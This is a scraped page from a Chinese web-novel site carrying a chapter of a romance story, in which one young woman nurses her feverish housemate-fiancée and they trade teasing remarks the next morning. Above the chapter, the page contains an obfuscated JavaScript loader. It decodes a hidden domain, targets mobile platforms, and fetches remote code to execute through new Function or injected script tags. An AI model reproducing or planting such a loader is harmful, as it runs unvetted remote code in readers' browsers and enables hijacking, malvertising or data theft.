98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(9)(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

今天却是比她还早到家,鞋子早早摆在玄关。

左思右想,眼看饺子都快糊了。宋若想着,住在她家,提醒她吃饭,应该不算干涉她自由,不会引起反感。不叫她的话反而不好了,有吃独食的嫌疑。因此拨通了她的号码。

这还是签订契约那天存下来的,第一次打。

来电铃声自孟璟的房间传出。直到自动挂断,都没有人接。

宋若等了等,再打了一个。

还是没人接。

该不会生病了?

孟大小姐那双鞋那可是沾了不少泥印,也许去哪里淋了雨也不一定。

上楼的时候她还是有点忐忑,敲了敲门,也没听见应声,她蹙眉推门走进去。

两个人的房间陈设差不多,电灯开关也在差不多同样的地方。啪嚓一声,房间亮了。

孟璟睡在床上,呼吸声很重。

宋若走过去,喊了一声:孟璟。

抹香鲸的呼吸声并没有变化。

宋若炸着胆子伸手,找到她的额头。烫得一缩手。

可还不等她把手收回来,一股野蛮的力道将她的手拖拽了去。她轻呼一声,惊魂甫定去看,自己的手被孟璟拖过去,牢牢抱在了怀中。

所幸,她人还没醒。

糟糕的是,看到脸了,虽然是睡颜。

就,还挺乖的。

睡梦中的人含糊咕哝了句:妈,我好难受

宋若愣了愣,蹲下来,缓缓伸出另一只手,在那滚烫的小脸上轻轻摸了摸。

脸也是烫得吓人。

她的手还没来得及撤下来,床上的人双眼蓦地睁开来。

那双长而不细的犀利凤眼与她看个正着。

第12章 虚惊一场

宋若心道糟糕,被抹香鲸看了个正着,以往临场反应很快的她,不知道为什么却没能在对视的前两秒内移开视线。孟璟的双眼红赤赤的,显然烧得不轻。就在宋若心里警铃大作的当儿,啪嚓一声,她又合上了眼。

宋若:虚惊一场。

但是她立马知道自己高兴得太早。

对视危机是解除了没有错,可手臂还在人怀里抱着呢。

接下来的这五分钟,宋若这辈子都不想再经历第二遍。

从来没见过睡梦里那么能粘人的粘人精。

她的手臂刚抽出来一点儿,又给搂了回去,仿佛那小胳膊不是属于她宋若,而是属于她孟璟,是她的宝贝玩偶命根子一样,如此退出来三寸又被收回去一寸,攻守交替,努力了起码有一个世纪那么久,她才重获自由。

床上那只粘人的抹香鲸依旧睡得人事不知,而她本人则出了一身薄汗,胳膊热辣辣,脸上一阵阵发烫。

深呼吸几次才忍住没给这只臭鲸鱼来个回礼。

饺子糊成一团,宋若没眼看,反正也吃不成了。

叹息一声,拿了钥匙和手机出门,临出门前,目光偶然瞥到墙壁上挂的婚纱照的一角,下意识地还是躲了两躲,关上门的瞬间,心里头有一丝惊慌。

孟璟的脸,现在在她脑海里已经具象化了。

其实这个避免与阴郁女主对视的计策,实乃矮子里头挑将军,没有办法的办法,本来就不是长久之计。今天看见了,也没有什么,稳住,能赢。

孟璟醒来的时候是深夜十点多,肚子饿,浑身没有力气,嘴巴里边非常淡。床边放着热水、温度计和感冒药。她咦了一声,眼珠子咕噜转了两转,看看身上盖得严严实实的两床被子,再看一眼关掉的空调,忽而嗤了一声笑出来:不怕热死我。

出得房门来洗澡,发现便宜未婚妻的卧室早熄了灯,并没有在等她。

真是的,怎么照顾病人的。她非常非常不满。

洗了个澡,收拾干净,人没那么难受了,孟璟下楼觅食,从冰箱里拿了一食盒生饺子进厨房,进去没来得及开灯,便看到电压力锅的指示灯亮着,红色的指示灯,在黑黢黢的夜里,像独角兽的眼睛。孟璟开了灯,快步过去揭开盖子,愣了两秒,在腾腾的白色水蒸气里,脸上缓缓绽出一朵笑意,笑到一半,她回过神,严厉地制止自己:有什么好笑的,不就是锅白米粥吗,哼,没出息,不许笑。然而只过了两秒钟,又不自觉地笑起来,拿碗盛粥的时候,哼着支小曲儿。

次日周六,宋若比闹钟先醒过来,站在房外的走廊上往下看,阴郁女主已经起床了,坐在桌上吃早饭呢。

宋若进房间,将长发梳起来,扎成个高马尾。换好了校服,洗漱完,挎着书包下楼。

她走到桌前,孟璟头也不抬地说了句:早。

宋若又记起昨天傍晚,手臂被抹香鲸支配的恐惧,微微打了个寒噤,但还是答道:早。

桌上有两份早餐,都是提子吐司配果汁,宋若想了想,认为还是不要矫情的好,很大方地坐下来。才吃了没两口,阴郁女主又淡淡开口了:粥煲得不错。

宋若心想,那是你家电饭煲好。

孟璟等了半天没动静,绷不住了,将手机一推,抬起头来,目光灼灼地看着便宜未婚妻,语带戏谑:哎,老婆。

宋若噎了一下,咳嗽了两声,呛红了眼眶,伸手要端果汁,杯子已经递到她跟前。她接过来喝了一口,平复了一下,垂着眼睑冷冷说:有意思么,开这种玩笑。

孟璟哈了一声:又来了,又假装不看我,昨天只怕趁我睡着把我看了个遍吧。

看来昨天偶然睁眼的那个瞬间,她烧得迷迷糊糊,只怕是忘记了。但宋若听出来她话里有话,回了她一句:你别血口喷人。

以为人人都跟她这种阴郁鬼畜一样变态么。

孟璟撑着下巴,指尖在下巴轻轻敲,眼睛眯了眯,话题一下子变得极具跳跃性:话说那天,为什么突然要说,我是自由的?

宋若慢慢问:你难道不想自由?其实这种反问句,要眼神犀利地与对方对视,才能达到效果。可她还是对凝视孟璟这件事感到十分抗拒,生怕自己一失足成千古恨,步原主后尘。故而能免则免。她看的是盘子里的吐司。仿佛问的是它。

孟璟险些笑出来,但不知怎么的又很有点生气,断然地说:我想啊。

那不就结了。宋若站起来,拿纸巾擦了擦嘴,舒出一口气,我先去学校了。

孟璟望着她远去的背影,嘶了声。这小矮子,近来司机也放假,本来想亲自载她去学校,当答谢她的护理。她跑得倒挺快。好像有什么要吃了她似的。

孟璟又回班上上课了,刘纯觉得很神奇,大佬回来以后,三不五时盯着前方宋若同学的背影出神,一盯就是几分钟。坊间传言,大佬曾经拒绝某位初中部考年级前几的小姑娘,说性别不是问题,年龄不是距离,只是她坚决坚决不会喜欢学霸,对方小妹妹不甘心,含泪问:是说我书呆子的意思吗。大佬说:不是,我成绩差,自卑。

难道,刘纯眉头一皱,难道大佬也难逃真香定律,要迷上宋大学霸了?

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间